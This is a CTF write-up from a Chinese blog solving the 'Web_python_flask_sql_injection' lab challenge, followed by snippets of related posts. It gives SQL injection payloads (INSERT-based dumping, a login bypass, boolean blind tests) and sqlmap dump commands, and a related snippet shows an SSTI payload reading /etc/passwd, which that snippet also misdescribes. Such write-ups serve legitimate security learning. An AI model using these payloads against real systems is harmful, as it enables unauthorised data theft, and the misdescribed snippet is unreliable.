Web_python_flask_sql_injection(攻防世界web)

最新推荐文章于 2023-08-19 09:09:06 发布
最新推荐文章于 2023-08-19 09:09:06 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 攻防世界(web)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/107494085
版权

目录


主要功能就是登陆注册,修改个人信息,能留言 然后可以关注别人
下载附件审计,先看路由 route.py

/index路由

不存在过滤 关键是结果直接回显
在这里插入图片描述

追踪到Others.py的Add函数
在这里插入图片描述

a','1','2020-7-20'),(Null,(select database()),'1','2020-7-20')#

在这里插入图片描述

最终Payload: a','1','2020-7-20'),(Null,(select flag from flag),'1','2020-7-20')#

/login路由

在这里插入图片描述在这里插入图片描述

到One函数之后,最后到Sel函数
在这里插入图片描述
在这里插入图片描述

无法登录
在这里插入图片描述

用万能密码直接登录之前创建的第一个用户
在这里插入图片描述

然后我新创建的用户反正除了这个admin1 都可以随便输一个密码就能登录了。。。。
这里应该也有一个盲注(数据库名是之前别的位置注入出来的)

admin1' or 1=(select database() = 'flask')# (这个用户名要是刚才试过万能密码的那个,别的用户名不过表达式对错都会成功登录)
在这里插入图片描述
在这里插入图片描述

成功登录了,也就是说等式成立
Payload: admin1' or 1=(paylaod)#

/register路由

在这里插入图片描述

追踪到forms.py,可以看到username这里有过滤,但email并没有
在这里插入图片描述

追踪到Others.py
在这里插入图片描述
在这里插入图片描述

在页面测试,可以进行盲注,如果正确就会回显Please use a different email address.
在这里插入图片描述在这里插入图片描述

这里的邮箱需要之前已经注册过的

可以写脚本也可以用sqlmap跑
在这里插入图片描述

这里因为在payload处加了前缀后缀,为了邮箱正确就把email处参数值清空了

sqlmap.py -r test.txt -p email --prefix "123'" --suffix "#@qq.com" --dbms mysql 5.0 --dbs  -v 4 --tamper=space2comment -csrf-token="csrf_token"

在这里插入图片描述

sqlmap.py -r test.txt -p email --prefix "123'" --suffix "#@qq.com" --dbms mysql 5.0 -D flask -T flag -C "flag" --dump  -v 4 --tamper=space2comment -csrf-token="csrf_token"

在这里插入图片描述

/edit_profile路由

在这里插入图片描述

再到forms.py
在这里插入图片描述在这里插入图片描述

note(页面上的About me)这里的过滤相对来说不严,有可乘之机

再看更新数据时用到的Mod函数
在这里插入图片描述

Sql语句基本就是update user set username=’admin’,note=’hello’ where id=1 这个样子
在这里插入图片描述

update user set username=’admin’,note=1' and (select 1=1 ) and '1'='1where id=1

在这里插入图片描述

1' and (select 1=1 ) and '1'='1的结果
在这里插入图片描述

1' and (select 1=2 ) and '1'='1的结果
在这里插入图片描述

也就是可以利用这个进行布尔盲注

参考https://www.guildhab.top/?p=2073

Arnoldqqq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask mysql sql注入_SQL注入进阶-Flask中转SQLMAP案例
weixin_33195162的博客
02-04 632
前言在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?一道CTF题的思考先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,...
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 281
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
攻防世界-Web_python_template_injection
最新发布
weixin_49539962的博客
08-19 99
经过尝试很快就能发现使用{{}}就能注入,并且会回显报错信息,3的位置是{{}}中语句的执行结果。找可用的引用,有一个file的类型(真不好找啊,又多字长得又像),flag应该会保存至文件中。一说到pythonweb我就想到flask框架,但从没用过flask注入。file出现在第41个type中,在72个type有print。先打印后端的一些文件。,这篇文章有详细的介绍。
攻防世界 WEB Web_python_flask_sql_injection
qq_41696858的博客
12-13 930
没啥好说的,题目已经把几个关键点给出来了,flasksql注入,还给了源码 那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题 干就完了,下载源码,第一个注入点是routes.py里面的index路由项 res = mysql.Add("post", ['NULL', "'%s'" % form.post.data, "'%s'" % current_user.id, "'%s'" % now()])
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1011
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
攻防世界--Web_python_flask_sql_injection
qq_46263951的博客
01-10 227
一开始看题目还以为是一道Flask+SQL的题,这里出现的漏洞点都是在SQL 代码审计: 路由执行代码都在routes.py,自定义函数在others.py add:插入 del:删除 mod:更新 sel:查询 /index路由: 发现没有任何过滤,插入第一条语句用来闭合,第二条执行注入 a','1','2022-1-1'),(Null,(select database()),'1','2022-1-1')# ...
攻防世界--Web进阶--Shrine--flask模板注入--全局变量Current-app--沙盒逃逸
z2560088的博客
10-11 1914
查看项目源码 代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def saf...
攻防世界WEB高手进阶之python_template_injection
uihijio的博客
05-18 433
打开网站是写着以下 然后测试以下{{1+1}}被执行了 然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag 使用{{’’.class.mro[2].subclasses()40.read()}}打开
CG CTF WEB SQL Injection
无限迭代中......
07-04 616
http://chinalover.sinaapp.com/web15/index.php 题解: <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ ...
a-master (1).zip_Python 管理平台_flask_python flask_python 管理_python
09-21
Python Flask 是一个轻量级的Web服务程序框架,它以其简洁和模块化的代码结构而受到开发者们的喜爱。在“a-master (1).zip”这个压缩包中,我们很显然会发现一个基于Python Flask构建的奖项管理平台。这个平台可能是...
api.rar_API_IML语言_orwxh_python flask
09-23
Python Flask是一个轻量级的Web服务器网关接口(WSGI)微框架,非常适合快速开发API。它的核心概念是路由、视图函数和模板。路由定义了URL结构,视图函数处理请求并返回响应,而模板则用于生成HTML或其他类型的动态...
FLASK_BUILDING_PYTHON_WEB_SERVICES
01-30
Unleash the full potential of the Flask web framework by creating small to large and powerful web applications.
python_pythonweb_
10-01
1. **Python Web框架**:Python有多个流行的Web框架,如Flask、Django、FastAPI等,它们提供了一种简洁的方式来构建Web应用程序。这里提到的可能是使用了其中一种,或者自定义的Web服务结构。 2. **HTTP POST请求**...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 PythonFlask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6614
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
python web开发-flask中使用sqlalchemy
挨踢学霸
03-28 4494
SqlAlchemy是一个python的ORM框架。在flask中有一个flask-sqlalchemy的扩展,使用起来很方便。1.       创建一个sqlalchemy的Model模块创建一个models.py的模块创建model的时候,首先引入flask-sqlalchemy的扩展from flask import Flaskfrom flask_sqlalchemy import SQL...
python Web安全之防止SQL注入
Fantasy_worm的博客
01-03 3734
伴随着Web2.0、社交网络、微博等一系列新型互联网产品的兴起,基于Web环境的互联网应用越来越广泛,Web攻击的手段也越来越多样,Web安全史上的一个重要里程碑是大约1999年发现的SQL注入攻击,之后的XSS,CSRF等攻击手段愈发强大,Web攻击的思路也从服务端转向了客户端,转向了浏览器和用户。 在安全领域,一般用帽子的颜色来比喻黑客的善与恶,白帽子是指那些工作在反黑客领域的技术专家,这个...
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界web题总结A
MIGENGKING的博客
08-06 577
题1: 思路:题目说右键用不了,因为打开右键可以查看网页的代码,所以我们要想办法打开网页大源代码: 复制链接在浏览器上打开: 因为右键用不了:我们可以按一下快捷键: 1):可以直接按“F12”(不过有些电脑不可以,需要按“Fn+F12”) 2):直接按“Ctrl+u” 打开源代码后发现了flag的一般形式:所以就去验证然后就对了。这道题很简单。 题2: 题目应该是get和post传参: PO...
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码或获取敏感信息。 Python 作为一种流行的 Web 开发语言,广泛应用于 Web 应用程序中。Python Web 框架(如 Flask、Django 等)通常使用模板引擎来生成动态内容。在模板引擎中,可以使用变量、表达式、条件语句、循环语句等功能来生成动态内容。然而,如果在模板引擎中直接使用用户输入作为变量或表达式的一部分,而没有对用户输入进行适当的验证和过滤,就可能导致模板注入漏洞。 例如,在 Flask 应用程序中,可以使用 Jinja2 模板引擎来生成动态内容。如果在模板中使用了用户输入的变量,攻击者可以构造恶意输入来执行任意代码。例如,以下代码中的 name 变量可能是用户输入的: ```python from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', '') return render_template('index.html', name=name) if __name__ == '__main__': app.run(debug=True) ``` 在 index.html 中,可以使用 {{ name }} 来显示用户输入的 name 变量。如果攻击者在 name 中注入了模板代码,就可能导致模板注入漏洞。例如,攻击者可以构造如下的输入: ``` {{ ''.__class__.__mro__[1].__subclasses__()[414]('/etc/passwd').read() }} ``` 这段代码在模板引擎中会被解释为调用 Python 的 subprocess.Popen 函数执行命令 /etc/passwd,并读取其输出。攻击者可以通过这种方式执行任意代码,获取敏感信息或者直接控制服务器。 为了防止 SSTI 漏洞,开发人员应该对用户输入进行严格的验证和过滤,避免在模板引擎中直接使用用户输入作为变量或表达式的一部分。可以使用 Python 的安全模板引擎(如 jinja2-sandbox、jinja2-timeout 等)来限制模板执行的权限,或者使用模板引擎提供的安全过滤器(如 escape、safe 等)来过滤用户输入。此外,还应该及时更新 Web 应用程序和相关组件,以避免已知的漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值